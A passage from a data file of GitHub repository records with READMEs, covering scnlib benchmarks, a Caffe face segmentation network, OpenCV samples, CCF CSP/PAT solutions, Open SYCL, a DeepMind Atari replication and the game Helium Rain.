:------------------------------ | --------------: | ------------: |\n| empty | 15.4 | 14.0 |\n| `std::scanf` | 17.0 | 14.2 |\n| `std::istream` | 18.6 | 14.2 |\n| `scn::input` | 18.2 | 14.2 |\n| `scn::input` (header-only) | 161 | 138 |\n| `scn::scan_value` | 18.6 | 14.2 |\n| `scn::scan_value` (header-only) | 124 | 106 |\n\n![Benchmark results](benchmark/bloat/results_release.png?raw=true \"Benchmark results\")\n\n#### Debug build (-g)\n\n| Method | Executable size | Stripped size |\n| :------------------------------ | --------------: | 
------------: |\n| empty | 27.5 | 14.0 |\n| `std::scanf` | 605 | 22.2 |\n| `std::istream` | 651 | 26.2 |\n| `scn::input` | 1633 | 94.3 |\n| `scn::input` (header-only) | 10533 | 1010 |\n| `scn::scan_value` | 1765 | 90.3 |\n| `scn::scan_value` (header-only) | 9289 | 698 |\n\n![Benchmark results](benchmark/bloat/results_debug.png?raw=true \"Benchmark results\")\n\n#### Conclusions\n\nWhen using optimizing build options, scnlib provides equal binary size to `<iostream>`, and a ~10% increase compared to `scanf`.\nIf using `strip`, these differences go away.\n\nIn Debug mode, scnlib is ~3x bigger compared to `<iostream>` and `scanf`.\n\nHeader-only mode makes executable size ~6-7x bigger.\n\n### Build time\n\nThis test measures the time it takes to compile a binary when using different libraries.\nNote that the time it takes to compile the library is not taken into account (unfair measurement against precompiled stdlibs).\n\nThese tests were run on an Ubuntu 21.10 machine with an i7-8565U and 40 GB of RAM, using GCC 11.2.0.\nThe compiler flags for a debug build were `-g`, and `-O3 -DNDEBUG` for a release build.\n\nTo run these tests yourself, enable CMake flag `SCN_BUILD_BUILDTIME`.\nIn order for these tests to work, `c++` must point to a gcc-compatible C++ compiler binary,\nand a POSIX-compatible `/usr/bin/time` must be present.\n\n```sh\n$ cd build\n$ cmake -DSCN_BUILD_BUILDTIME=ON ..\n$ make -j\n$ ./benchmark/buildtime/run-buildtime-tests.sh\n```\n\n#### Build time\n\nTime is in seconds of CPU time (user time + sys/kernel time).\nLower is better.\n\n| Method | Debug | Release |\n| :-------------------------- |------:|--------:|\n| empty | 0.07 | 0.03 |\n| `scanf` | 0.20 | 0.19 |\n| `std::istream` / `std::cin` | 0.26 | 0.24 |\n| `scn::input` | 0.55 | 0.54 |\n| `scn::input` (header only) | 1.88 | 3.69 |\n\n#### Memory consumption\n\nMemory is in mebibytes (MiB).\nLower is better.\n\n| Method | Debug | Release |\n| :-------------------------- |------:|--------:|\n| empty | 17.4 | 20.3 |\n| `scanf` | 49.1 | 49.7 |\n| `std::istream` / `std::cin` | 60.8 | 60.8 |\n| `scn::input` | 96.0 | 92.7 |\n| `scn::input` (header only) | 217 | 247 |\n\n#### Conclusions\n\nscnlib takes about 2x longer to compile compared to `<iostream>`, and uses about 70% more memory.\n\nHeader-only mode can make compilation up to 7x slower, and use up to 3x as much memory.\n\n## Acknowledgements\n\nThe contents of this library are heavily influenced by {fmt} and its derivative works. \n<https://github.com/fmtlib/fmt>\n\nThe bundled ranges implementation found in this library is based on NanoRange: \n<https://github.com/tcbrindle/NanoRange>\n\nThe default floating-point parsing algorithm used by this library is implemented by fast_float: \n<https://github.com/fastfloat/fast_float>\n\nThe Unicode-related parts of this library are based on utfcpp: \n<https://github.com/nemtrif/utfcpp>\n\nThe design of this library is also inspired by the Python `parse` library: \n<https://github.com/r1chardj0n3s/parse>\n\n## License\n\nscnlib is licensed under the Apache License, version 2.0. 
\nCopyright (c) 2017 Elias Kosunen \nSee LICENSE for further details\n\nSee the directory `licenses/` for third-party licensing information.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "YuvalNirkin/face_segmentation", "link": "https://github.com/YuvalNirkin/face_segmentation", "tags": ["face", "segmentation"], "stars": 652, "description": "Deep face segmentation in extremely hard conditions", "lang": "C++", "repo_lang": "", "readme": "# Deep face segmentation in extremely hard conditions\n![alt text](https://yuvalnirkin.github.io/assets/img/projects/face_segmentation/face_segmentation_teaser.jpg \"Samples\") \nCOFW sample images segmented using our method.\n\n[Yuval Nirkin](http://www.nirkin.com/), [Iacopo Masi](http://www-bcf.usc.edu/~iacopoma/), [Anh Tuan Tran](https://sites.google.com/site/anhttranusc/), [Tal Hassner](http://www.openu.ac.il/home/hassner/), and [Gerard Medioni](http://iris.usc.edu/people/medioni/index.html).\n\n## News (10/07/18)\n- [New FCN model](https://github.com/YuvalNirkin/face_segmentation/releases/download/1.1/face_seg_fcn8s_300_no_aug.zip) released for lower resolution images (300X300), trained without augmentations. Useful if you have limited GPU memory.\n- A better performing and more efficient U-Net model will be released soon, including training and inference scripts using PyTorch. \n\n## Overview\nThis project provides an interface for face segmentation using Caffe with a fully convolutional neural network.\nThe network was trained on IARPA Janus CS2 dataset (excluding subjects that are also in [LFW](http://vis-www.cs.umass.edu/lfw/)) using a novel process for collecting ground truth face segmentations, involving our tool for [semi-supervised Face video segmentation](https://github.com/YuvalNirkin/face_video_segment). 
Additional synthetic images were generated by augmenting hands from the [EgoHands dataset](http://vision.soic.indiana.edu/projects/egohands/), and augmenting 3D models of glasses and microphones.\n\nIf you find this code useful, please make sure to cite our paper in your work:\n\nYuval Nirkin, Iacopo Masi, Anh Tuan Tran, Tal Hassner, Gerard Medioni, \"[On Face Segmentation, Face Swapping, and Face Perception](https://arxiv.org/abs/1704.06729)\", IEEE Conference on Automatic Face and Gesture Recognition (FG), Xi'an, China, May 2018\n\nPlease see the [project page](http://www.openu.ac.il/home/hassner/projects/faceswap/) for more details, more resources and updates on this project.\n\n## Dependencies\n| Library | Minimum Version | Notes |\n|--------------------------------------------------------------------|-----------------|------------------------------------------|\n| [Boost](http://www.boost.org/) | 1.47 | Optional - For command line tools |\n| [OpenCV](http://opencv.org/) | 3.0 | |\n| [Caffe](https://github.com/BVLC/caffe) | 1.0 |\u2615\ufe0f |\n\n## Installation\n- Use CMake and your favorite compiler to build and install the library.\n- Download the [face_seg_fcn8s.zip](https://github.com/YuvalNirkin/face_segmentation/releases/download/1.0/face_seg_fcn8s.zip) or [face_seg_fcn8s_300_no_aug.zip](https://github.com/YuvalNirkin/face_segmentation/releases/download/1.1/face_seg_fcn8s_300_no_aug.zip) and extract to \"data\" in the installation directory.\n- Add \"bin\" in the installation directory to the path.\n\n## Usage\n- For using the library's C++ interface, please take a look at the [Doxygen generated documentation](https://yuvalnirkin.github.io/docs/face_segmentation/).\n- For Python, go to \"interfaces/python\" in the installation directory and run:\n```BASH\npython face_seg.py\n```\n- For running the segmentation on a single image:\n```BASH\ncd path/to/face_segmentation/bin\nface_seg_image ../data/images/Alison_Lohman_0001.jpg -o . -m ../data/face_seg_fcn8s.caffemodel -d ../data/face_seg_fcn8s_deploy.prototxt\n```\n- For running the segmentation on all the images in a directory:\n```BASH\ncd path/to/face_segmentation/bin\nface_seg_batch ../data/images -o . -m ../data/face_seg_fcn8s.caffemodel -d ../data/face_seg_fcn8s_deploy.prototxt\n```\n- For running the segmentation on a list of images, first prepare a file \"img_list.txt\", in which each line is a path to an image, and call the following command:\n```BASH\ncd path/to/face_segmentation/bin\nface_seg_batch img_list.txt -o . -m ../data/face_seg_fcn8s.caffemodel -d ../data/face_seg_fcn8s_deploy.prototxt\n```\n\nNote: The segmentation model was trained by cropping the training images using [find_face_landmarks](https://github.com/YuvalNirkin/find_face_landmarks). For best results, crop the input images the same way, with crop resolution below 350 X 350. A Matlab function is available [here](https://github.com/YuvalNirkin/find_face_landmarks/blob/master/interfaces/matlab/bbox_from_landmarks.m).\n\n## Important note\nIn our paper we used a different network for our face segmentation. In the process of converting it to the Caffe model used in our [end-to-end face swap distribution](https://github.com/YuvalNirkin/face_swap) we noticed some performance drop. We are working to fix this. We therefore ask that you please check here soon for updates on this Caffe model. 
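Going back to the cropping note in the Usage section above, here is a rough OpenCV sketch of that preprocessing step. This helper is not part of this repository; the face bounding box is assumed to come from find_face_landmarks or a similar detector:

```cpp
// Hedged sketch: clamp a face crop to at most 350 x 350 pixels before
// handing the image to the segmentation tools.
#include <opencv2/opencv.hpp>
#include <algorithm>

cv::Mat crop_face(const cv::Mat& image, cv::Rect face_box)
{
    // Keep the crop inside the image bounds.
    face_box &= cv::Rect(0, 0, image.cols, image.rows);
    cv::Mat crop = image(face_box).clone();

    // Downscale if either dimension exceeds the recommended 350 pixel limit.
    const int max_side = 350;
    const int longest = std::max(crop.cols, crop.rows);
    if (longest > max_side) {
        const double scale = static_cast<double>(max_side) / longest;
        cv::resize(crop, crop, cv::Size(), scale, scale, cv::INTER_AREA);
    }
    return crop;
}
```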
\n\n## Citation\n\nPlease cite our paper with the following bibtex if you use our face segmentation network:\n\n``` latex\n@inproceedings{nirkin2018_faceswap,\n title={On Face Segmentation, Face Swapping, and Face Perception},\n booktitle = {IEEE Conference on Automatic Face and Gesture Recognition},\n author={Nirkin, Yuval and Masi, Iacopo and Tran, Anh Tuan and Hassner, Tal and Medioni, G\\'{e}rard},\n year={2018},\n }\n```\n\n## Related projects\n- [End-to-end, automatic face swapping pipeline](https://github.com/YuvalNirkin/face_swap), an example application using our face segmentation method.\n- [Interactive system for fast face segmentation ground truth labeling](https://github.com/YuvalNirkin/face_video_segment), used to produce the training set for our deep face segmentation.\n- [CNN3DMM](http://www.openu.ac.il/home/hassner/projects/CNN3DMM/), estimation of 3D face shapes from single images.\n- [ResFace101](http://www.openu.ac.il/home/hassner/projects/augmented_faces/), deep face recognition used in the paper to test face swapping capabilities. \n\n## Copyright\nCopyright 2017, Yuval Nirkin, Iacopo Masi, Anh Tuan Tran, Tal Hassner, and Gerard Medioni \n\nThe SOFTWARE provided on this page is provided \"as is\", without any guarantee made as to its suitability or fitness for any particular use. It may contain bugs, so use of this tool is at your own risk. We take no responsibility for any damage of any sort that may unintentionally be caused through its use.\n", "readme_type": 
"markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bytefish/opencv", "link": "https://github.com/bytefish/opencv", "tags": ["opencv", "face-recognition", "machine-learning"], "stars": 651, "description": "OpenCV projects: Face Recognition, Machine Learning, Colormaps, Local Binary Patterns, Examples...", "lang": "C++", "repo_lang": "", "readme": "# bytefish/opencv #\n\nThis repository contains OpenCV code and documents.\n\nMore (maybe) here: [https://www.bytefish.de](https://www.bytefish.de).\n\n## colormaps ##\n\nAn implementation of various colormaps for OpenCV2 C++ in order to enhance visualizations. Feel free to fork and add your own colormaps.\n\n### Related posts ###\n\n* https://bytefish.de/blog/colormaps_in_opencv\n \n## misc ##\n\nSample code that doesn't belong to a specific project. \n\n* Skin Color detection\n* PCA\n* TanTriggs Preprocessing\n\n## machinelearning ##\n\nDocument and sourcecode about OpenCV C++ machine learning API including:\n\n* Support Vector Machines\n* Multi Layer Perceptron\n* Normal Bayes\n* k-Nearest-Neighbor\n* Decision Tree\n\n### Related posts ###\n \n* https://www.bytefish.de/blog/machine_learning_opencv\n\n## eigenfaces ##\n\nEigenfaces implementation using the OpenCV2 C++ API. There's a very basic function for loading the dataset, you probably want to make this a bit more sophisticated. The dataset is available at [http://www.cl.cam.ac.uk/research/dtg/attarchive/facedatabase.html](http://www.cl.cam.ac.uk/research/dtg/attarchive/facedatabase.html).\n\n### Related posts ###\n\n* https://www.bytefish.de/blog/pca_in_opencv\n* https://www.bytefish.de/blog/eigenfaces\n* https://www.bytefish.de/blog/fisherfaces\n \n## lbp ##\n\nImplements various Local Binary Patterns with the OpenCV2 C++ API:\n \n* Original LBP\n* Circular LBP (also known as Extended LBP)\n* Variance-based LBP\n\nBasic code for spatial histograms and histogram matching with a chi-square distance is included, but it's not finished right now. There's a tiny demo application you can experiment with.\n\n### Related posts ###\n\n* https://www.bytefish.de/blog/local_binary_patterns\n* https://www.bytefish.de/blog/numpy_performance/\n \n## lda ##\n\nFisherfaces implementation with the OpenCV2 C++ API. \n\n### Related posts ###\n\n* https://www.bytefish.de/blog/fisherfaces\n* https://www.bytefish.de/blog/lda_in_opencv\n* https://www.bytefish.de/blog/fisherfaces_in_opencv\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "richenyunqi/CCF-CSP-and-PAT-solution", "link": "https://github.com/richenyunqi/CCF-CSP-and-PAT-solution", "tags": ["ccf-csp", "pat", "vscode", "cpp14"], "stars": 650, "description": "CCF CSP\u548cPAT\u8003\u8bd5\u9898\u89e3\uff08\u4f7f\u7528C++14\u8bed\u6cd5\uff09", "lang": "C++", "repo_lang": "", "readme": "[![996.icu](https://img.shields.io/badge/link-996.icu-red.svg)](https://996.icu) [![LICENSE](https:// img.shields.io/badge/license-Anti%20996-blue.svg)](https://github.com/996icu/996.ICU/blob/master/LICENSE)\n\n# CCF CSP exam and PAT class A and B exam questions\n\n\n\nThis warehouse is a supporting warehouse for the book \"Detailed Algorithm Explanation (C++11 Language Description)\", which is mainly responsible for updating the codes of CCF CSP and PAT Class A and Class B problems. 
The book \"Detailed Algorithm Explanation (C++11 Language Description)\" has been put on the shelves of major e-commerce platforms, and you can find the corresponding products by searching the title of the book. For information about book errata, please refer to [Book Errata](Book Errata.md).\n\nFor an introduction to the CCF CSP exam, please refer to [CCF CSP Certification Examination Online Evaluation System] (https://www.cnblogs.com/richenyunqi/p/14892974.html), for an introduction to the PAT exam, please refer to [Zhejiang University Computer Programming Introduction to Proficiency Test (PAT)](https://www.cnblogs.com/richenyunqi/p/14892982.html). The code in this warehouse will be maintained all the time, and new solutions will be updated as soon as possible after each exam. I hope this work can give some help to algorithm beginners. Since both the CCF CSP and PAT exams already support the C++14 standard, **all the solution codes in this warehouse will be written based on the C++14 grammar**. Before compiling the code in this repository, it is best to choose a compiling environment that supports C++14.\n\nIf you find any problems with the code in this warehouse, please provide an explanation by submitting an issue, preferably with wrong input data or correct solution code.\n\n## Solution directory\n\nFor the convenience of reference, a summary link of the problem solutions in this warehouse is attached under the [Problem Solution Catalogue] (Problem Solution Catalogue) folder:\n\n1. [CCF CSP Problem Solution Catalog](Problem Solution Catalog/CCF%20CSP Problem Solution Catalog.md)\n2. [PAT Class A Problem Solution Catalog](Problem Solution Catalog/PAT Class A Problem Solution Catalog.md)\n3. [PAT Level B Problem Solution Catalog](Problem Solution Catalog/PAT Level B Problem Solution Catalog.md)\n\n## related suggestion\n\n1. In order to better browse this repository, it is recommended to use `chrome` or the new version of `Edge` browser and install the following plug-ins (the plug-in links provided here need to be opened scientifically). There are many ways to surf the Internet scientifically. For example, by installing [Blue Lantern] (https://github.com/ainiyiwan/forum), you can normally access Google related websites.\n\n 1. [Gitako - GitHub file tree](https://chrome.google.com/webstore/detail/gitako-github-file-tree/giljefjcheohhamkjphiebfjnlphnokk): For the opened Github code repository, it can provide the project directory and Automatically generate a warehouse directory tree sidebar, through this plugin you can easily open any file in this warehouse.\n 2. [MathJax Plugin for Github](https://chrome.google.com/webstore/detail/mathjax-plugin-for-github/ioemnmodlmafdkllaclgeombjnmnbima): Render the `latex` syntax of `markdown` text on `github` .\n\n2. It is recommended to install VSCode and configure accordingly to write and run C++ code. VSCode is a modern editor. Compared with vc++, CodeBlocks, Dev c++ and other old IDEs, VSCode provides more powerful functions; compared with Visual Studio, VSCode is smaller. For the installation of VSCode and the configuration of the C/C++ environment, please refer to [Choose a handy weapon\u2014\u2014VSCode configures C/C++ learning environment (Xiao Baixiang)](https://zhuanlan.zhihu.com/p/147366852).\n3. You can use the windows batch file to compare program output and sample output or to perform program matching. 
You can refer to [Using VSCode Terminal to Redirect and Compare Program Output and Correct Output](https://www.cnblogs.com/richenyunqi/ p/14894172.html).\n4. For code templates of some common data structures and algorithms, please refer to [ACM, OI, OJ code templates](https://github.com/richenyunqi/code-templates).\n5. To facilitate communication, a QQ group has been established, the group number is [673612216](https://qm.qq.com/cgi-bin/qm/qr?k=7vZCZuLbDvjYI33zxScZMV0irFFaO-xH&jump_from=webapi), can be added as required.\n\n## Acknowledgments\n\n### Book Errata\n\nThanks to the sharp-eyed readers and friends who pointed out the errata of this book: Su Yixuan, Wang Zhaoxiang, [Frazier Lei](https://github.com/FrazierLei).\n\n### Code improvements\n\n- Thanks to [Night Walking Girl](https://me.csdn.net/qq_37967797) for improving the code of `CCF certification 201812-3CIDR merge`\n- Thanks to [Highlight_Jin](https://me.csdn.net/Highlight_Jin) for the improvement of `CCF certification 201512-4 delivery` code\n\n### Bug Tips\n\n- Thanks to **Zhang Jianxun** for pointing out the bugs in `CCF Certification 201612-1 Intermediate Number` and providing the corresponding error test data\n- Thanks to [Xingchen Haoyu](https://me.csdn.net/amf12345) for pointing out the bugs in `CCF Certification 201803-3URL Mapping` and providing the corresponding error test data\n- Thanks to [chocolate-emperor](https://github.com/chocolate-emperor) for the reminder of the code error of `CCF certification 201512-2 elimination game`\n- Thanks to [Tian Yixuan](https://me.csdn.net/qq_45057634) for the reminder of the code error of `CCF Certification 20161202-Salary Calculation`\n- Thanks to [Xu Jiacheng](https://github.com/xiaobanni) for pointing out the bugs in `CCF certification 201403-4 wireless network` and providing the corresponding error test data\n- Thanks to [promise6512](https://github.com/promise6512) for pointing out the bugs in `pat Class A 1104. Sum of Number Segments, Class B 1049. Fragments of Number Segments and`\n\n### Code Supplement\n\n- Thanks to [zhanyeye](https://github.com/zhanyeye) for supplementing the solution code of `CCF certification 201312-4 interesting number`\n\n## tip\n\nWarehouse maintenance is not easy, every tip and support from you is my motivation to keep updating and maintaining the warehouse. Thousands of rivers and mountains are always love, can I give a reward? \u053e \u053e\n\n
\n\n*(Donation QR codes for Alipay and WeChat appear here in the original README.)*\n
", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "OpenSYCL/OpenSYCL", "link": "https://github.com/OpenSYCL/OpenSYCL", "tags": ["sycl", "opencl", "cuda", "hip", "gpgpu", "high-performance", "gpu", "gpu-computing", "high-performance-computing", "nvidia-cuda", "rocm", "clang", "hipsycl", "opensycl"], "stars": 650, "description": "Multi-backend implementation of SYCL for CPUs and GPUs", "lang": "C++", "repo_lang": "", "readme": "![Project logo](/doc/img/logo/logo-color.png)\n\n# Open SYCL (formerly known as hipSYCL)\n\n**(Note: This project is currently in progress of changing its name. Documentation and code may still use the older name hipSYCL)**\n\nOpen SYCL is a modern SYCL implementation targeting CPUs and GPUs from all major vendors that supports many use cases and approaches for implementing SYCL:\n\n1. **A generic, single-pass compiler infrastructure that compiles kernels to a unified code representation** that is then lowered at runtime to target devices, providing a high degree of portability, low compilation times, flexibility and extensibility. Support includes:\n 1. NVIDIA CUDA GPUs through PTX;\n 2. AMD ROCm GPUs through amdgcn code;\n 3. Intel GPUs through SPIR-V;\n2. Additionally, **Open SYCL can aggregate existing clang toolchains and augment them with support for SYCL constructs**. This allows for a high degree of interoperability between SYCL and other models such as CUDA or HIP. Support includes:\n 1. Any LLVM-supported CPU (including e.g. x86, arm, power etc) through the regular clang host toolchain with dedicated compiler transformation to accelerate SYCL constructs;\n 2. NVIDIA CUDA GPUs through the clang CUDA toolchain;\n 3. AMD ROCm GPUs through the clang HIP toolchain;\n 4. Intel GPUs through oneAPI Level Zero and the clang SYCL toolchain (*highly* experimental)\n3. Or **Open SYCL can be used in library-only compilation flows**. In these compilation flows, Open SYCL acts as a C++ library for third-party compilers. This can have portability advantages or simplify deployment. This includes support:\n 1. Any CPU supported by any OpenMP compilers;\n 2. NVIDIA GPUs through CUDA and the NVIDIA nvc++ compiler, bringing NVIDIA vendor support and day 1 hardware support to the SYCL ecosystem\n\n\nOpen SYCL supports compiling source files into a single binary that can run on all these backends when building against appropriate clang distributions. Additionally, **Open SYCL is the only major SYCL implementation that supports a single-pass compiler design, where the code is only parsed once for both host and target devices**. More information about the supported [compilation flows can be found here](doc/compilation.md).\n\nThe runtime architecture of Open SYCL consists of the main library `hipSYCL-rt`, as well as independent, modular plugin libraries for the individual backends:\n![Runtime architecture](/doc/img/runtime.png)\n\nOpen SYCL's compilation and runtime design allows Open SYCL to \n* Either provide a **single, unified compiler infrastructure with a single code representation across all targets**, or\n* to **effectively aggregate multiple toolchains that are otherwise incompatible, making them accessible with a single SYCL interface.**\n\nThe philosophy behind Open SYCL is to leverage such existing toolchains as much as possible. 
This brings not only maintenance and stability advantages, but enables performance on par with those established toolchains by design, and also allows for maximum interoperability with existing compute platforms.\nFor example, the Open SYCL CUDA and ROCm backends rely on the clang CUDA/HIP frontends that have been augmented by Open SYCL to *additionally* also understand SYCL code. This means that the Open SYCL compiler can not only compile SYCL code, but also CUDA/HIP code *even if they are mixed in the same source file*, making all CUDA/HIP features - such as the latest device intrinsics - also available from SYCL code ([details](doc/hip-source-interop.md)). Additionally, vendor-optimized template libraries such as rocPRIM or CUB can also be used with Open SYCL. Consequently, Open SYCL allows for **highly optimized code paths in SYCL code for specific devices**.\n\nBecause a SYCL program compiled with Open SYCL looks just like any other CUDA or HIP program to vendor-provided software, vendor tools such as profilers or debuggers also work well with Open SYCL.\n\nThe following image illustrates how Open SYCL fits into the wider SYCL implementation ecosystem:\n\n\n## About the project\n\nWhile Open SYCL started its life as a hobby project, development is now led and funded by Heidelberg University. Open SYCL not only serves as a research platform, but is also a solution used in production on machines of all scales, including some of the most powerful supercomputers.\n\n### Contributing to Open SYCL\n\nWe encourage contributions and are looking forward to your pull request! Please have a look at [CONTRIBUTING.md](CONTRIBUTING.md). If you need any guidance, please just open an issue and we will get back to you shortly.\n\nIf you are a student at Heidelberg University and wish to work on Open SYCL, please get in touch with us. There are various options possible and we are happy to include you in the project :-)\n\n### Citing Open SYCL\n\nOpen SYCL is a research project. As such, if you use Open SYCL in your research, we kindly request that you cite:\n\n*Aksel Alpay, B\u00e1lint Soproni, Holger W\u00fcnsche, and Vincent Heuveline. 2022. Exploring the possibility of a hipSYCL-based implementation of oneAPI. In International Workshop on OpenCL (IWOCL'22). Association for Computing Machinery, New York, NY, USA, Article 10, 1\u201312. https://doi.org/10.1145/3529538.3530005*\n\nor, depending on your focus,\n\n*Aksel Alpay and Vincent Heuveline. 2020. SYCL beyond OpenCL: The architecture, current state and future direction of hipSYCL. In Proceedings of the International Workshop on OpenCL (IWOCL \u201920). Association for Computing Machinery, New York, NY, USA, Article 8, 1. DOI:https://doi.org/10.1145/3388333.3388658*\n\n(The latter is a talk and available [online](https://www.youtube.com/watch?v=kYrY80J4ZAs). Note that some of the content in this talk is outdated by now)\n\n### Acknowledgements\n\nWe gratefully acknowledge [contributions](https://github.com/illuhad/hipSYCL/graphs/contributors) from the community.\n\n## Performance\n\nOpen SYCL has been repeatedly shown to deliver very competitive performance compared to other SYCL implementations or proprietary solutions like CUDA. See for example:\n\n* *Sohan Lal, Aksel Alpay, Philip Salzmann, Biagio Cosenza, Nicolai Stawinoga, Peter Thoman, Thomas Fahringer, and Vincent Heuveline. 2020. SYCL-Bench: A Versatile Single-Source Benchmark Suite for Heterogeneous Computing. In Proceedings of the International Workshop on OpenCL (IWOCL \u201920). 
Association for Computing Machinery, New York, NY, USA, Article 10, 1. DOI:https://doi.org/10.1145/3388333.3388669*\n* *Brian Homerding and John Tramm. 2020. Evaluating the Performance of the hipSYCL Toolchain for HPC Kernels on NVIDIA V100 GPUs. In Proceedings of the International Workshop on OpenCL (IWOCL \u201920). Association for Computing Machinery, New York, NY, USA, Article 16, 1\u20137. DOI:https://doi.org/10.1145/3388333.3388660*\n* *Tom Deakin and Simon McIntosh-Smith. 2020. Evaluating the performance of HPC-style SYCL applications. In Proceedings of the International Workshop on OpenCL (IWOCL \u201920). Association for Computing Machinery, New York, NY, USA, Article 12, 1\u201311. DOI:https://doi.org/10.1145/3388333.3388643*\n\n\n### Extracting performance & benchmarking Open SYCL\n\n#### General performance hints\n\n* Building Open SYCL against newer LLVM generally results in better performance for backends that are relying on LLVM.\n* Unlike other SYCL implementations that may rely on kernel compilation at runtime, Open SYCL relies heavily on ahead-of-time compilation. So make sure to use appropriate optimization flags when compiling.\n* For the CPU backend:\n * Don't forget that, due to Open SYCL's ahead-of-time compilation nature, you may also want to enable latest vectorization instruction sets when compiling, e.g. using `-march=native`.\n * Enable OpenMP thread pinning (e.g. `OMP_PROC_BIND=true`). Open SYCL uses asynchronous worker threads for some light-weight tasks such as garbage collection, and these additional threads can interfere with kernel execution if OpenMP threads are not bound to cores.\n * Don't use `nd_range` parallel for unless you absolutely have to, as it is difficult to map efficiently to CPUs. \n * If you don't need barriers or local memory, use `parallel_for` with `range` argument.\n * If you need local memory or barriers, scoped parallelism or hierarchical parallelism models may perform better on CPU than `parallel_for` kernels using `nd_range` argument and should be preferred. Especially scoped parallelism also works well on GPUs.\n * If you *have* to use `nd_range parallel_for` with barriers on CPU, the `omp.accelerated` compilation flow will most likely provide substantially better performance than the `omp.library-only` compilation target. See the [documentation on compilation flows](doc/compilation.md) for details.\n\n#### Comparing against other LLVM-based compilers\n\nWhen targeting the CUDA or HIP backends, Open SYCL just massages the AST slightly to get `clang -x cuda` and `clang -x hip` to accept SYCL code. Open SYCL is not involved in the actual code generation. Therefore *any significant deviation in kernel performance compared to clang-compiled CUDA or clang-compiled HIP is unexpected.*\n\nAs a consequence, if you compare it to other llvm-based compilers please make sure to compile Open SYCL against the same llvm version. Otherwise you would effectively be simply comparing the performance of two different LLVM versions. 
This is in particular true when comparing it to clang CUDA or clang HIP.\n\n\n## Current state\nOpen SYCL is not yet a fully conformant SYCL implementation, although many SYCL programs already work with Open SYCL.\n* SYCL 2020 [feature support matrix](https://github.com/hipSYCL/featuresupport)\n* A (likely incomplete) list of [limitations](doc/limitations.md) for older SYCL 1.2.1 features\n* A (also incomplete) timeline showing development [history](doc/history.md)\n\n## Hardware and operating system support\n\nSupported hardware:\n* Any CPU for which a C++17 OpenMP compiler exists\n* NVIDIA CUDA GPUs. Note that clang, which Open SYCL relies on, may not always support the very latest CUDA version which may sometimes impact support for *very* new hardware. See the [clang documentation](https://www.llvm.org/docs/CompileCudaWithLLVM.html) for more details.\n* AMD GPUs that are [supported by ROCm](https://github.com/RadeonOpenCompute/ROCm#hardware-support)\n\nOperating system support currently strongly focuses on Linux. On Mac, only the CPU backend is expected to work. Windows support with CPU and CUDA backends is experimental, see [Using Open SYCL on Windows](https://github.com/illuhad/hipSYCL/wiki/Using-hipSYCL-on-Windows).\n\n## Installing and using Open SYCL\n* [Building & Installing](doc/installing.md)\n\nIn order to compile software with Open SYCL, use `syclcc` which automatically adds all required compiler arguments to the CUDA/HIP compiler. `syclcc` can be used like a regular compiler, i.e. you can use `syclcc -o test test.cpp` to compile your SYCL application called `test.cpp` with Open SYCL.\n\n`syclcc` accepts both command line arguments and environment variables to configure its behavior (e.g., to select the target platform CUDA/ROCm/CPU to compile for). See `syclcc --help` for a comprehensive list of options.\n\nWhen compiling with Open SYCL, you will need to specify the targets you wish to compile for using the `--hipsycl-targets=\"backend1:target1,target2,...;backend2:...\"` command line argument, `HIPSYCL_TARGETS` environment variable or cmake argument. See the documentation on [using Open SYCL](doc/using-hipsycl.md) for details.\n\nInstructions for using Open SYCL in CMake projects can also be found in the documentation on [using Open SYCL](doc/using-hipsycl.md).\n\n## Documentation\n* Open SYCL [design and architecture](doc/architecture.md)\n* Open SYCL runtime [specification](doc/runtime-spec.md)\n* Open SYCL [compilation model](doc/compilation.md)\n* How to use raw HIP/CUDA inside Open SYCL code to create [optimized code paths](doc/hip-source-interop.md)\n* A simple SYCL example code for testing purposes can be found [here](doc/examples.md).\n* [SYCL Extensions implemented in Open SYCL](doc/extensions.md)\n* [Macros used by Open SYCL](doc/macros.md)\n* [Environment variables supported by Open SYCL](doc/env_variables.md)\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kristjankorjus/Replicating-DeepMind", "link": "https://github.com/kristjankorjus/Replicating-DeepMind", "tags": [], "stars": 650, "description": "Reproducing the results of \"Playing Atari with Deep Reinforcement Learning\" by DeepMind", "lang": "C++", "repo_lang": "", "readme": "Replicating-DeepMind\n====================\n\nReproducing the results of \"Playing Atari with Deep Reinforcement Learning\" by DeepMind. 
All the information is in our [Wiki](https://github.com/kristjankorjus/Replicating-DeepMind/wiki).\n\n**Progress:** System is up and running on a GPU cluster with cuda-convnet2. It can learn to play better than random but not much better yet :) It is rather fast but still about 2x slower than DeepMind's original system. It does not have RMSprop implemented at the moment which is our next goal. \n\nNote 1: You can also check out a popular science article we wrote about the system to [Robohub](http://robohub.org/artificial-general-intelligence-that-plays-atari-video-games-how-did-deepmind-do-it/).\n\nNote 2: Nathan Sprague has a implementation based on Theano. It can do fairly well. See [his github](https://github.com/spragunr/deep_q_rl) for more details.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "strangergwenn/HeliumRain", "link": "https://github.com/strangergwenn/HeliumRain", "tags": [], "stars": 650, "description": "HELIUM RAIN / Full sources for Helium Rain, a realistic space opera using Unreal Engine 4", "lang": "C++", "repo_lang": "", "readme": "# Helium Rain source code\n\nHelium Rain is a realistic space opera for PC, now available on Steam.\n\n - [Website](http://helium-rain.com)\n - [Store page](https://store.steampowered.com/app/681330)\n\n![Game screenshot](http://helium-rain.com/gallery_data/blueheart.jpg)\n\n## About the game\n\nHelium Rain is a single-player space sim that places you at the helm of a spacefaring company. Exploration, trading, station-building, piracy are all options. Helium Rain relies on both spaceflight and strategy gameplay, mixed together in a creative way. Destroying a freighter has a direct impact on the economy, while declaring war will make your environment more hostile.\n\n - Realistic economy model with supply and demand\n - Strategy gameplay with procedural quests, world exploration, technology upgrades\n - 12 playable ships with weapon and engine upgrades\n - Fast-paced combat with a Newtonian flight model\n - Localized damage model for spacecrafts\n - Quick-play skirmish mode\n\n![Game 